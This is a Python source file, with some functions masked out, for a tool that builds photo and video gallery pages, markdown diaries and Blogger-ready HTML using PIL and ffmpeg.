*self.thumbsize, descr)\n else:\n return IMGPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return IMGDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n if not self.caption:\n return BIMGPAT % (self.uri, self.resized_url)\n else:\n return f'{BIMGPAT}\\n{CAPTION_PAT}' % (self.uri, self.\n resized_url, self.caption)\n\n\nclass PostVideo(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '[](%s)' % (self.uri,)\n else:\n return '[](%s)\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return VIDPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return VIDPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return VIDDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n x = f'<p style=\"text-align: center;\">{self.iframe}</p>'\n if not self.caption:\n return x\n else:\n return f'%s\\n{CAPTION_PAT}' % (x, self.caption)\n\n\nclass PostSubdir(PostItem):\n\n def to_html_dcim(self, args):\n basename = os.path.basename(self.htmname)\n posts = self.posts\n title = self.caption\n print_html(args, posts, title, self.htmname)\n if not self.caption:\n return DIRPOST % (basename, self.thumb, *self.thumbsize)\n else:\n return DIRPOSTCAPTION % (basename, self.thumb, *self.thumbsize,\n self.caption)\n\n\n<mask token>\n\n\ndef parse_markdown(filename):\n \"\"\"\n Generate Post objects from markdown. 
Date must be present in each post and\n posts must be ordrered by date.\n \"\"\"\n if not os.path.exists(filename):\n error('File not found', filename)\n posts = list()\n with open(filename, encoding='utf-8') as f:\n line = next(f)\n if line.startswith('# '):\n title = line[2:].strip()\n record = []\n next(f)\n else:\n title = None\n record = [line]\n for line in f:\n if not line.startswith('___'):\n record.append(line)\n else:\n posts.append(Post.from_markdown(record))\n record = []\n daterank = defaultdict(int)\n for post in posts:\n daterank[post.date] += 1\n post.daterank = daterank[post.date]\n for post1, post2 in zip(posts[:-1], posts[1:]):\n if post1.date > post2.date:\n error('Posts are not ordered', f'{post1.date} > {post2.date}')\n return title, posts\n\n\ndef print_markdown(posts, title, fullname):\n with open(fullname, 'wt', encoding='utf-8') as fdst:\n print(f'# {title}\\n', file=fdst)\n for post in posts:\n date = f'[{post.date[0:4]}/{post.date[4:6]}/{post.date[6:8]}]'\n print(date, file=fdst)\n if post.text:\n print(file=fdst)\n for line in post.text.splitlines():\n if not line:\n print(file=fdst)\n else:\n for chunk in textwrap.wrap(line, width=78):\n print(chunk, file=fdst)\n if post.medias:\n print(file=fdst)\n for media in post.medias:\n print(media.to_markdown(), file=fdst)\n print('______', file=fdst)\n\n\n<mask token>\n\n\ndef print_html(args, posts, title, html_name, target='regular'):\n assert target in ('regular', 'blogger')\n with io.StringIO() as f:\n print_html_to_stream(args, posts, title, f, target)\n html = f.getvalue()\n if html_name:\n if os.path.exists(html_name):\n with open(html_name, 'rt', encoding='utf-8') as f:\n html0 = f.read()\n if html == html0:\n return None\n with open(html_name, 'wt', encoding='utf-8') as f:\n f.write(html)\n return None\n else:\n return html\n\n\n<mask token>\n\n\ndef is_image_file(name):\n return os.path.splitext(name)[1].lower() in ('.jpg', '.jpeg', '.png',\n '.gif', '.bmp', '.webp', '.tif')\n\n\n<mask token>\n\n\ndef is_media(name):\n return is_image_file(name) or is_video_file(name)\n\n\n<mask token>\n\n\ndef date_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})(?:\\\\D|$)', name, re.ASCII)):\n digits = match.group(1)\n if validate_date(digits):\n return digits\n return None\n\n\ndef date_from_item(filename):\n if (date := date_from_name(filename)):\n return date\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%Y%m%d')\n\n\ndef time_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})\\\\D(\\\\d{6})(?:\\\\D|$)', name,\n re.ASCII)):\n digits = match.group(2)\n hour, minute, second = int(digits[0:2]), int(digits[2:4]), int(digits\n [4:6])\n if 0 <= hour < 24 and 0 <= minute < 60 and 0 <= second < 60:\n return digits\n return None\n\n\ndef time_from_item(filename):\n if (time := time_from_name(filename)):\n return time\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%H%M%S')\n\n\n<mask token>\n\n\ndef get_image_info(filename):\n date = date_from_item(filename)\n time = time_from_item(filename)\n img = Image.open(filename)\n width, height = img.size\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n return (date, time, width, height, size\n ), f'{date} {time}, dim={width}x{height}, {size} MB'\n\n\ndef get_video_info(filename, info_fullname):\n if os.path.exists(info_fullname):\n with open(info_fullname) as f:\n info = f.readline().split()\n date, time, width, height, 
size, duration, fps = info[0], info[1], int(\n info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6]\n )\n formatted_info = format_video_info(date, time, width, height, size,\n duration, fps)\n return (date, time, width, height, size, duration, fps), formatted_info\n else:\n info, formatted_info = make_video_info(filename, info_fullname)\n with open(info_fullname, 'wt') as f:\n print(' '.join([str(_) for _ in info]), file=f)\n return info, formatted_info\n\n\ndef make_video_info(filename, info_fullname):\n date = date_from_item(filename)\n time = time_from_item(filename)\n command = [*FFPROBE_CMD.split(), filename]\n try:\n output = check_output(command, stderr=STDOUT).decode()\n width, height, fps, duration = parse_ffprobe_output(output)\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n output = format_video_info(date, time, width, height, size,\n duration, fps)\n except CalledProcessError as e:\n output = e.output.decode()\n warning(output)\n raise\n return (date, time, width, height, size, duration, fps), output\n\n\ndef parse_ffprobe_output(ffprobe_output):\n match = re.match(\n '(\\\\d+),(\\\\d+),(\\\\d+)/(\\\\d+),(\\\\d+/\\\\d+).*\\\\s(\\\\d+\\\\.\\\\d+)',\n ffprobe_output, re.DOTALL)\n width = int(match.group(1))\n height = int(match.group(2))\n fps = round(int(match.group(3)) / int(match.group(4)), 1)\n duration = round(float(match.group(6)))\n return width, height, fps, duration\n\n\ndef format_video_info(date, time, width, height, size, duration, fps):\n return (\n f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'\n )\n\n\n<mask token>\n\n\ndef thumbname(name, key):\n return key + '-' + name + '.jpg'\n\n\ndef size_thumbnail(width, height, maxdim):\n if width >= height:\n return maxdim, int(round(maxdim * height / width))\n else:\n return int(round(maxdim * width / height)), maxdim\n\n\ndef make_thumbnail_image(args, image_name, thumb_name, size):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_image(image_name, thumb_name, size)\n\n\ndef create_thumbnail_image(image_name, thumb_name, size):\n imgobj = Image.open(image_name)\n if imgobj.mode != 'RGBA' and image_name.endswith('.jpg') and not (\n image_name.endswith('.gif') and imgobj.info.get('transparency')):\n imgobj = imgobj.convert('RGBA')\n imgobj.thumbnail(size, Image.LANCZOS)\n imgobj = imgobj.convert('RGB')\n imgobj.save(thumb_name)\n\n\ndef make_thumbnail_video(args, video_name, thumb_name, size, duration):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_video(args, video_name, thumb_name, size, duration)\n\n\n<mask token>\n\n\ndef create_thumbnail_video(args, filename, thumbname, size, duration):\n delay = min(duration - 1, args.thumbnails.thumbdelay)\n sizearg = '%dx%d' % size\n command = (\n 'ffmpeg -y -v error -itsoffset -%d -i \"%s\" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s \"%s\"'\n )\n command = command % (delay, filename, sizearg, thumbname)\n result = os.system(command)\n try:\n img1 = Image.open(thumbname)\n except:\n warning('Unable to save thumbnail for', filename)\n return\n img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))\n width, height = img1.size\n img1.paste(img2, (6, height - 20 - 6), None)\n img1.save(thumbname)\n\n\n<mask token>\n\n\ndef create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):\n\n def size_thumbnail(width, height, 
xmax, ymax):\n width2 = xmax\n height2 = int(round(xmax * height / width))\n if height2 < ymax:\n width2 = int(round(ymax * width / height))\n height2 = ymax\n return width2, height2\n thumblist = [os.path.basename(item.thumb) for item in items]\n widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size\n , thumblist)\n thumbnum = widthnum * heightnum\n img = Image.new('RGB', size, SUBDIR_BACKCOL)\n for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):\n row = ind // widthnum\n col = ind % widthnum\n img2 = Image.open(os.path.join(thumbdir, thumb))\n w, h = size_thumbnail(*img2.size, width[col], height[row])\n cropdim = (w - width[col]) // 2, (h - height[row]) // 2, (w - width\n [col]) // 2 + width[col], (h - height[row]) // 2 + height[row]\n img2 = img2.resize((w, h), Image.LANCZOS)\n img2 = img2.crop(cropdim)\n img.paste(img2, (offsetx[col], offsety[row]))\n if os.path.exists(thumb_name):\n imgref = Image.open(thumb_name)\n byteio = io.BytesIO()\n img.save(byteio, 'JPEG')\n byteio.seek(0)\n imgnew = Image.open(byteio)\n diff = ImageChops.difference(imgnew, imgref)\n if diff.getbbox() is None:\n return\n img.save(thumb_name)\n\n\ndef mosaic_geometry(size, thumblist):\n if len(thumblist) == 1:\n widthnum = 1\n heightnum = 1\n elif len(thumblist) <= 3:\n widthnum = 1\n heightnum = 2\n elif len(thumblist) <= 8:\n widthnum = 2\n heightnum = 2\n else:\n widthnum = 3\n heightnum = 3\n if widthnum == 1:\n width = [size[0] - 2]\n else:\n width = [size[0] // widthnum - 2] * (widthnum - 1)\n width.append(size[0] - (1 + sum(width) + 2 * len(width) + 1))\n if heightnum == 1:\n height = [size[1] - 2]\n else:\n height = [size[1] // heightnum - 2] * (heightnum - 1)\n height.append(size[1] - (1 + sum(height) + 2 * len(height) + 1))\n offsetx = [1]\n for w in width[:-1]:\n offsetx.append(offsetx[-1] + w + 2)\n offsety = [1]\n for h in height[:-1]:\n offsety.append(offsety[-1] + h + 2)\n return widthnum, heightnum, width, height, offsetx, offsety\n\n\n<mask token>\n\n\ndef list_of_htmlfiles_in_items(itemlist):\n htmlist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n htmlist.append(item.htmname)\n htmlist.extend(list_of_htmlfiles_in_items(item.sublist))\n return htmlist\n\n\ndef list_of_thumbnails(posts, diary=False):\n thumblist = list()\n for post in posts:\n thumblist.extend(list_of_thumbnails_in_items(post.medias))\n if diary is False:\n thumblist.extend(list_of_thumbnails_in_items(post.dcim))\n return thumblist\n\n\ndef list_of_thumbnails_in_items(itemlist):\n thumblist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n thumblist.append(os.path.basename(item.thumb))\n thumblist.extend(list_of_thumbnails_in_items(item.sublist))\n else:\n thumblist.append(os.path.basename(item.thumb))\n return thumblist\n\n\ndef purge_htmlfiles(args, posts):\n \"\"\"\n Purge root dir from irrelevant html files\n \"\"\"\n htmlist = list_of_htmlfiles(args, posts)\n html_to_remove = list()\n for fullname in glob.glob(os.path.join(args.root, '*.htm*')):\n if fullname not in htmlist:\n html_to_remove.append(fullname)\n if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(html_to_remove)} html files to remove. Continue [y|n]? 
'\n ).lower()\n if inpt == 'n':\n return\n for name in html_to_remove:\n print('Removing html files', name)\n os.remove(name)\n\n\ndef purge_thumbnails(args, thumbdir, posts, diary=False):\n \"\"\"\n Purge thumbnail dir from irrelevant thumbnails\n \"\"\"\n thumblist = list_of_thumbnails(posts, diary)\n thumbs_to_remove = list()\n for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):\n if os.path.basename(fullname) not in thumblist:\n thumbs_to_remove.append(fullname)\n if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in thumbs_to_remove:\n print('Removing thumbnail', name)\n os.remove(name)\n info_fullname = os.path.splitext(name)[0] + '.info'\n if os.path.exists(info_fullname):\n os.remove(info_fullname)\n\n\ndef is_media_within_dates(fullname, dates):\n if is_media(fullname):\n if type(dates) == tuple:\n return dates[0] <= date_from_item(fullname) <= dates[1]\n else:\n return True\n else:\n return False\n\n\ndef sorted_listdir(filelist):\n like_windows_explorer = True\n if not filelist:\n return filelist\n if like_windows_explorer:\n maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)\n\n def keyfunc(name):\n root, ext = os.path.splitext(name.lower())\n return root.ljust(maxlen, ' ') + ext\n else:\n keyfunc = str.lower\n return sorted(filelist, key=keyfunc)\n\n\ndef list_of_files(sourcedir, recursive):\n \"\"\"\n Return the list of full paths for files in source directory\n \"\"\"\n result = list()\n if recursive is False:\n listdir = sorted_listdir(os.listdir(sourcedir))\n if '.nomedia' not in listdir:\n for basename in listdir:\n result.append(os.path.join(sourcedir, basename))\n else:\n for root, dirs, files in os.walk(sourcedir):\n if '.nomedia' not in files:\n for basename in sorted_listdir(files):\n result.append(os.path.join(root, basename))\n return result\n\n\ndef list_of_medias(args, sourcedir, recursive):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n \"\"\"\n files = list_of_files(sourcedir, recursive)\n return [_ for _ in files if is_media_within_dates(_, args.dates)]\n\n\n<mask token>\n\n\ndef dispatch_post_items(list_of_post_items):\n subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]\n medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]\n return subdirs, medias\n\n\ndef create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n if os.path.isfile(media_fullname):\n if is_image_file(media_fullname):\n return create_item_image(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_video(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_subdir(args, media_fullname, sourcedir, thumbdir,\n key, thumbmax)\n\n\ndef create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n try:\n info, infofmt = get_image_info(media_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)\n return PostImage(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), 
thumbsize, infofmt)\n except PIL.UnidentifiedImageError:\n warning('Unable to read image', media_fullname)\n return None\n\n\ndef create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'\n try:\n info, infofmt = get_video_info(media_fullname, info_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_video(args, media_fullname, thumb_fullname,\n thumbsize, duration=info[5])\n return PostVideo(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except CalledProcessError:\n warning('Unable to read video', media_fullname)\n return None\n\n\n<mask token>\n\n\ndef relative_name(media_fullname, sourcedir):\n \"\"\"\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg\n -->\n deeper2_deepest_OCT_20000112_000004.jpg\n\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest\n -->\n deeper2_deepest\n \"\"\"\n x = os.path.relpath(media_fullname, sourcedir)\n x = x.replace('\\\\', '_').replace('/', '_').replace('#', '_')\n return x\n\n\n<mask token>\n\n\ndef make_posts_from_diary(args):\n md_filename = os.path.join(args.root, 'index.md')\n if os.path.exists(md_filename):\n title, posts = parse_markdown(md_filename)\n else:\n error('File not found', md_filename)\n for post in posts:\n for media in post.medias:\n media_fullname = os.path.join(args.root, media.uri)\n item = create_item(args, media_fullname, args.root, args.\n thumbdir, 'post', 400)\n media.thumb = item.thumb\n media.thumbsize = item.thumbsize\n media.descr = item.descr\n return title, posts\n\n\ndef create_items_by_date(args, medias, posts):\n if args.dates == 'diary':\n required_dates = {post.date for post in posts}\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n bydate = defaultdict(list)\n for media_fullname in medias:\n date = date_from_item(media_fullname)\n if date in required_dates:\n item = create_item(args, media_fullname, args.sourcedir, args.\n thumbdir, 'dcim', 300)\n if item:\n bydate[date].append(item)\n for date, liste in bydate.items():\n liste.sort(key=lambda item: time_from_item(item.uri))\n return bydate\n\n\n<mask token>\n\n\ndef make_posts_from_subdir(args, dirname):\n if args.bydir is False:\n medias_ext = list_of_medias(args, dirname, args.recursive)\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n postmedias = list()\n for item in medias_ext:\n postmedia = create_item(args, item, args.sourcedir, args.thumbdir,\n 'dcim', 300)\n if postmedia is not None:\n postmedias.append(postmedia)\n post = Post(date='00000000', text='', medias=[])\n post.dcim = postmedias\n posts = [post]\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.\n sourcedir)[0]\n return title, posts\n\n\n<mask token>\n\n\ndef create_gallery(args):\n title, posts = make_posts(args, args.sourcedir)\n print_html(args, posts, title, os.path.join(args.dest, args.rootname),\n 'regular')\n purge_htmlfiles(args, posts)\n if args.diary and not args.sourcedir:\n purge_thumbnails(args, args.thumbdir, posts, diary=True)\n else:\n 
purge_thumbnails(args, args.thumbdir, posts)\n\n\ndef create_diary(args):\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n if args.dates == 'diary':\n assert 0\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n title = args.sourcedir\n posts = list()\n for date in sorted(required_dates):\n posts.append(Post.from_date(date))\n os.makedirs(args.root, exist_ok=True)\n print_markdown(posts, title, os.path.join(args.root, 'index.md'))\n\n\ndef online_images_url(args):\n try:\n if args.urlblogger.startswith('http:') or args.urlblogger.startswith(\n 'https:'):\n with urlopen(args.urlblogger) as u:\n buffer = u.read()\n else:\n with open(args.urlblogger, 'rb') as f:\n buffer = f.read()\n except:\n error('Unable to read url', args.urlblogger)\n buffer = buffer.decode('utf-8')\n online_images = dict()\n for match in re.finditer('<div class=\"separator\"((?!<div).)*?</div>',\n buffer, flags=re.DOTALL):\n div_separator = match.group(0)\n div_separator = div_separator.replace(' ', '')\n elem_div = objectify.fromstring(div_separator)\n for elem_a in elem_div.iterchildren(tag='a'):\n href = elem_a.get('href')\n thumb = elem_a.img.get('src')\n online_images[os.path.basename(href)] = href, thumb\n online_videos = list()\n for match in re.finditer(\n '<iframe allowfullscreen=\"allowfullscreen\".*?</iframe>', buffer,\n flags=re.DOTALL):\n iframe = match.group(0)\n online_videos.append(iframe)\n return online_images, online_videos\n\n\ndef compare_image_buffers(imgbuf1, imgbuf2):\n \"\"\"\n return True if images read on file are identical, False otherwise\n \"\"\"\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not diff.getbbox()\n\n\ndef check_images(args, posts, online_images):\n result = True\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.basename in online_images:\n with open(os.path.join(args.root, media.uri), 'rb') as f:\n imgbuf1 = f.read()\n try:\n with urlopen(online_images[media.basename][0]) as u:\n imgbuf2 = u.read()\n except FileNotFoundError:\n print('File not found', online_images[media.\n basename][0])\n next\n if compare_image_buffers(imgbuf1, imgbuf2) is False:\n print('Files are different, upload', media.basename)\n elif 1:\n print('File already online', media.basename)\n else:\n print('File is absent, upload', media.basename)\n result = False\n elif type(media) is PostVideo:\n print('Video not checked', media.basename)\n else:\n assert False\n return result\n\n\ndef compose_blogger_html(args, title, posts, imgdata, online_videos):\n \"\"\" Compose html with blogger image urls\n \"\"\"\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.uri not in imgdata:\n print('Image missing: ', media.uri)\n else:\n img_url, resized_url = imgdata[media.uri]\n media.uri = img_url\n media.resized_url = resized_url\n elif type(media) is PostVideo:\n if not online_videos:\n print('Video missing: ', media.uri)\n else:\n media.iframe = online_videos[0]\n del online_videos[0]\n else:\n assert False\n return print_html(args, posts, title, '', target='blogger')\n\n\ndef prepare_for_blogger(args):\n \"\"\"\n Export blogger html to clipboard.\n If --full, export complete html, otherwise export html extract ready to\n paste into 
blogger edit mode.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n online_images, online_videos = online_images_url(args)\n if args.check_images and check_images(args, posts, online_images) is False:\n pass\n html = compose_blogger_html(args, title, posts, online_images,\n online_videos)\n if args.full is False:\n html = re.search('<body>(.*)?</body>', html, flags=re.DOTALL).group(1)\n html = re.sub('<script>.*?</script>', '', html, flags=re.DOTALL)\n html = STYLE.replace('%%', '%') + html\n if args.dest:\n with open(args.dest, 'wt', encoding='utf-8') as f:\n f.write(html)\n else:\n clipboard.copy(html)\n\n\ndef idempotence(args):\n \"\"\"\n For testing identity between a diary file and the fle obtained after reading\n and printing it. See testing.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n print_markdown(posts, title, os.path.join(args.dest, 'index.md'))\n\n\n<mask token>\n\n\nclass MyConfigParser(ConfigParser):\n \"\"\"Add input checking.\"\"\"\n\n def __init__(self):\n ConfigParser.__init__(self, inline_comment_prefixes=(';',))\n\n def error(self, section, entry):\n error('Missing or incorrect config value:', '[%s]%s' % (section, entry)\n )\n\n def getint(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getint(self, section, entry)\n else:\n return ConfigParser.getint(self, section, entry, raw=True,\n vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n def getboolean(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getboolean(self, section, entry)\n else:\n return ConfigParser.getboolean(self, section, entry, raw=\n True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n\ndef configfilename(params):\n return os.path.join(params.root, '.config.ini')\n\n\ndef createconfig(config_filename):\n with open(config_filename, 'wt') as f:\n f.writelines(CONFIG_DEFAULTS)\n\n\ndef read_config(params):\n config_filename = configfilename(params)\n try:\n if not os.path.exists(config_filename) or params.resetcfg:\n createconfig(config_filename)\n except:\n error('Error creating configuration file')\n try:\n getconfig(params, config_filename)\n except Exception as e:\n error('Error reading configuration file.', str(e), 'Use --resetcfg')\n\n\ndef getconfig(options, config_filename):\n\n\n class Section:\n pass\n options.source = Section()\n options.thumbnails = Section()\n options.photobox = Section()\n config = MyConfigParser()\n config.read(config_filename)\n options.source.sourcedir = config.get('source', 'sourcedir')\n options.source.bydir = config.getboolean('source', 'bydir')\n options.source.bydate = config.getboolean('source', 'bydate')\n options.source.diary = config.getboolean('source', 'diary')\n options.source.recursive = config.getboolean('source', 'recursive')\n options.source.dates = config.get('source', 'dates')\n options.source.github_pages = config.getboolean('source',\n 'github_pages', default=False)\n options.thumbnails.media_description = config.getboolean('thumbnails',\n 'media_description')\n options.thumbnails.subdir_caption = config.getboolean('thumbnails',\n 'subdir_caption')\n options.thumbnails.thumbdelay = config.getint('thumbnails', 'thumbdelay')\n options.thumbnails.threshold_thumbs = config.getint('thumbnails',\n 'threshold_thumbs')\n options.thumbnails.threshold_htmlfiles = config.getint('thumbnails',\n 'threshold_htmlfiles', 
default=3)\n options.photobox.loop = config.getboolean('photobox', 'loop')\n options.photobox.thumbs = config.getboolean('photobox', 'thumbs')\n options.photobox.autoplay = config.getboolean('photobox', 'autoplay')\n options.photobox.time = config.getint('photobox', 'time')\n options.photobox.zoomable = config.getboolean('photobox', 'zoomable')\n options.photobox.rotatable = config.getboolean('photobox', 'rotatable')\n options.photobox.wheelNextPrev = config.getboolean('photobox',\n 'wheelNextPrev')\n\n\n<mask token>\n\n\ndef setconfig_cmd(args):\n config_filename = configfilename(args)\n setconfig(config_filename, *args.setcfg)\n\n\ndef update_config(args):\n updates = ('sourcedir', args.sourcedir), ('bydir', BOOL[args.bydir]), (\n 'bydate', BOOL[args.bydate]), ('diary', BOOL[args.diary]), ('recursive'\n , BOOL[args.recursive]), ('dates', args.dates), ('github_pages',\n BOOL[args.github_pages])\n cfgname = configfilename(args)\n with open(cfgname) as f:\n cfglines = [_.strip() for _ in f.readlines()]\n for key, value in updates:\n for iline, line in enumerate(cfglines):\n if line.startswith(key):\n cfglines[iline] = f'{key} = {value}'\n break\n with open(cfgname, 'wt') as f:\n for line in cfglines:\n print(line, file=f)\n\n\ndef warning(*msg):\n print(colorama.Fore.YELLOW + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n\n\n<mask token>\n\n\ndef errorcode(msg):\n return ERRORS.splitlines().index(msg) + 1\n\n\ndef error(*msg):\n print(colorama.Fore.RED + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n sys.exit(errorcode(msg[0]))\n\n\n<mask token>\n\n\ndef setup_part1(args):\n \"\"\"\n Made before reading config file (config file located in args.root).\n Check and normalize root path.\n \"\"\"\n args.rootarg = args.root\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext == '':\n pass\n else:\n args.root = os.path.dirname(args.root)\n if args.root:\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n if args.gallery:\n os.mkdir(args.root)\n else:\n error('Directory not found', args.root)\n\n\ndef setup_part2(args):\n \"\"\"\n Made after reading config file.\n Check for ffmpeg in path.\n Create .thumbnails dir if necessary and create .nomedia in it.\n Copy photobox file to destination dir.\n Handle priority between command line and config file.\n \"\"\"\n if args.update:\n args.sourcedir = args.source.sourcedir\n args.bydir = args.source.bydir\n args.bydate = args.source.bydate\n args.diary = args.source.diary\n args.recursive = args.source.recursive\n args.dates = args.source.dates\n args.github_pages = args.source.github_pages\n elif args.gallery:\n args.source.sourcedir = args.sourcedir\n args.source.bydir = args.bydir\n args.source.bydate = args.bydate\n args.source.diary = args.diary\n args.source.recursive = args.recursive\n args.source.dates = args.dates\n args.source.github_pages = args.github_pages\n update_config(args)\n if args.github_pages:\n args.html_suffix = '.html'\n else:\n args.html_suffix = '.htm'\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext:\n args.rootname = os.path.basename(args.rootarg)\n else:\n args.rootname = 'index' + args.html_suffix\n if args.sourcedir:\n args.sourcedir = os.path.abspath(args.sourcedir)\n if os.path.splitdrive(args.sourcedir)[0]:\n drive, rest = os.path.splitdrive(args.sourcedir)\n args.sourcedir = drive.upper() + rest\n if not os.path.isdir(args.sourcedir):\n error('Directory not found', args.sourcedir)\n elif args.gallery and args.diary is False and 
args.update is None:\n error('Directory not found', 'Use --sourcedir')\n if args.dest:\n args.dest = os.path.abspath(args.dest)\n if args.dest is None:\n args.dest = args.root\n if args.blogger and args.urlblogger is None:\n error('No blogger url (--url)')\n if args.gallery or args.update:\n for exe in ('ffmpeg', 'ffprobe'):\n try:\n check_output([exe, '-version'])\n except FileNotFoundError:\n error('File not found', exe)\n if args.github_pages:\n args.thumbrep = 'thumbnails'\n else:\n args.thumbrep = '.thumbnails'\n args.thumbdir = os.path.join(args.dest, args.thumbrep)\n if not os.path.exists(args.thumbdir):\n os.mkdir(args.thumbdir)\n open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()\n favicondst = os.path.join(args.dest, 'favicon.ico')\n if not os.path.isfile(favicondst):\n faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')\n shutil.copyfile(faviconsrc, favicondst)\n photoboxdir = os.path.join(args.dest, 'photobox')\n if not os.path.exists(photoboxdir):\n photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')\n shutil.copytree(photoboxsrc, photoboxdir)\n if args.dates:\n if not (args.gallery or args.create):\n pass\n if args.dates == 'source':\n pass\n elif args.dates == 'diary':\n if args.create:\n error('Incorrect date format', args.dates)\n elif re.match('\\\\d+-\\\\d+', args.dates):\n date1, date2 = args.dates.split('-')\n if validate_date(date1) and validate_date(date2):\n args.dates = date1, date2\n else:\n error('Incorrect date format', args.dates)\n else:\n error('Incorrect date format', args.dates)\n\n\ndef main(argstring=None):\n colorama.init()\n args = parse_command_line(argstring)\n setup_part1(args)\n read_config(args)\n setup_part2(args)\n try:\n if args.gallery or args.update:\n create_gallery(args)\n elif args.create:\n create_diary(args)\n elif args.blogger:\n prepare_for_blogger(args)\n elif args.idem:\n idempotence(args)\n elif args.setcfg:\n setconfig_cmd(args)\n except KeyboardInterrupt:\n warning('Interrupted by user.')\n\n\n<mask token>\n",
